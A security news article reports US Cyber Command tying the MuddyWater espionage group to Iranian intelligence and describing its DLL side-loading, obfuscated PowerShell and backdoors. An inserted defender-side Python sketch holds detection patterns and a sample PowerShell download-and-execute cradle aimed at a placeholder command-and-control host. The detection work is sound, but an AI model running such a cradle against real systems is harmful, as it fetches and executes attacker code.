The U.S. Cyber Command (USCYBERCOM) on Wednesday officially
confirmed MuddyWater’s ties to the Iranian intelligence apparatus,
while simultaneously detailing the various tools and tactics
adopted by the espionage actor to burrow into victim networks.
“MuddyWater has been seen using a variety of techniques to
maintain access to victim networks,” USCYBERCOM’s Cyber National
Mission Force (CNMF) said[1]
in a statement. “These include side-loading DLLs[2]
in order to trick legitimate programs into running malware and
obfuscating PowerShell scripts to hide command and control
functions.”
The agency characterized the hacking efforts as a subordinate
element within the Iranian Ministry of Intelligence and Security
(MOIS), corroborating earlier reports about the nation-state
actor’s provenance.
Also tracked under the monikers Static Kitten, Seedworm, Mercury
and TEMP.Zagros, MuddyWater[3]
is known for its attacks[4]
primarily directed against a wide gamut of entities in governments,
academia, cryptocurrency, telecommunications, and oil sectors in
the Middle East. The group is believed to have been active[5]
at least since 2017[6].
Recent intrusions mounted by the adversary have involved
exploiting the ZeroLogon (CVE-2020-1472) vulnerability as well as
leveraging remote desktop management tools such as ScreenConnect[7]
and Remote Utilities[8]
to deploy custom backdoors that could enable the attackers to gain
unauthorized access to sensitive data.
Last month, Symantec’s Threat Hunter Team publicized findings[9]
about a new wave of hacking activities unleashed by the MuddyWater
group against a string of telecom operators and IT companies
throughout the Middle East and Asia during the previous six months
using a blend of legitimate tools, publicly available malware, and
living-off-the-land (LotL[10]) methods.
Also incorporated into its toolset is a backdoor named Mori and
a piece of malware called PowGoop, a DLL loader designed to decrypt
and run a PowerShell-based script that establishes network
communications with a remote server.
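The two techniques CNMF calls out above (DLL side-loading and obfuscated PowerShell for command and control) and the PowGoop loader pattern (a DLL that decrypts and launches a PowerShell script) both leave a footprint in endpoint telemetry. The following Python sketch is an added defender-side example, not code from the article or from any vendor named in it: it decodes and scores an -EncodedCommand PowerShell launch and flags a well-known DLL name loaded from outside the Windows system directories. The sample events, the DLL watch list and the event field names are constructed assumptions.

```python
import base64
import re

# Directories from which well-known system DLLs are expected to load.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# DLL names programs resolve by name (hypothetical watch list, not from the article).
SIDELOAD_WATCHLIST = {"version.dll", "dbghelp.dll", "wtsapi32.dll", "cryptbase.dll"}

# Constructed EDR-style telemetry (not from the article): an encoded PowerShell
# launch, a DLL loaded from a user-writable path, and a normal system DLL load.
SAMPLE_EVENTS = [
    {"type": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + base64.b64encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')"
         .encode("utf-16-le")).decode()},
    {"type": "image_load", "image": "C:\\Users\\Public\\updater.exe", "module": "C:\\Users\\Public\\version.dll"},
    {"type": "image_load", "image": "C:\\Windows\\System32\\svchost.exe", "module": "C:\\Windows\\System32\\version.dll"},
]

def inspect_powershell(cmdline: str) -> dict:
    """Indicators for one PowerShell command line; -EncodedCommand (base64 of UTF-16LE) is decoded first."""
    hits, decoded = [], None
    m = re.search(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if m:
        hits.append("encoded_command")
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            pass  # malformed blob: still flagged, just not decodable
    body = decoded or cmdline  # inspect the real script, not the base64 wrapper
    if re.search(r"\b(iex|invoke-expression)\b", body, re.I):
        hits.append("invoke_expression")
    if re.search(r"net\.webclient|downloadstring|invoke-webrequest", body, re.I):
        hits.append("download_cradle")
    return {"hits": hits, "decoded": decoded}

def is_suspicious_dll_load(module_path: str) -> bool:
    """True when a watch-listed DLL name resolves outside the system directories."""
    p = module_path.lower()
    return p.rsplit("\\", 1)[-1] in SIDELOAD_WATCHLIST and not p.startswith(SYSTEM_DIRS)

def triage(events: list) -> list:
    """Return (event, indicators) for every event that either check flags."""
    flagged = []
    for ev in events:
        hits = (inspect_powershell(ev["cmdline"])["hits"] if ev["type"] == "process"
                else ["dll_sideload_path"] if is_suspicious_dll_load(ev["module"]) else [])
        if hits:
            flagged.append((ev, hits))
    return flagged
```

Running `triage(SAMPLE_EVENTS)` flags the encoded launch with its decoded script and the user-writable DLL load, while the load from System32 passes.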
Malware samples attributed to the advanced persistent threat
(APT) have been made available on the VirusTotal malware
aggregation repository, which can be accessed here[11].
“Analysis of MuddyWater activity suggests the group continues to
evolve and adapt their techniques,” SentinelOne researcher Amitai
Ben Shushan Ehrlich said[12]. “While still relying
on publicly available offensive security tools, the group has been
refining its custom toolset and utilizing new techniques to avoid
detection.”
References
1. said (www.cisa.gov)
2. DLLs (en.wikipedia.org)
3. MuddyWater (malpedia.caad.fkie.fraunhofer.de)
4. attacks (www.clearskysec.com)
5. active (unit42.paloaltonetworks.com)
6. since 2017 (blog.malwarebytes.com)
7. ScreenConnect (thehackernews.com)
8. Remote Utilities (thehackernews.com)
9. publicized findings (symantec-enterprise-blogs.security.com)
10. LotL (encyclopedia.kaspersky.com)
11. here (www.virustotal.com)
12. said (www.sentinelone.com)
Read more https://thehackernews.com/2022/01/us-cyber-command-links-muddywater.html